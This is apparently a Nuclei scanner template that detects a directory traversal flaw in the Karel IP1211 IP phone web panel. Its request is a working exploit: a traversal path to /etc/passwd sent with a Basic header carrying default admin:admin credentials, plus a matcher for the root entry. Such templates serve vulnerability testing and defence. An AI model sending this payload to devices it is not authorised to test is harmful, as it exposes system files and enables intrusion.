id: karel-ip-phone-lfi

info:
  name: Karel IP Phone IP1211 Web Management Panel - Directory Traversal
  author: 0x_Akoko
  severity: high
  description: A vulnerability in the Karel IP Phone IP1211 Web Management Panel allows remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter.
  reference:
    - https://cxsecurity.com/issue/WLB-2020100038
    - https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon
  tags: karel,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd"
    headers:
      Authorization: Basic YWRtaW46YWRtaW4=
    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200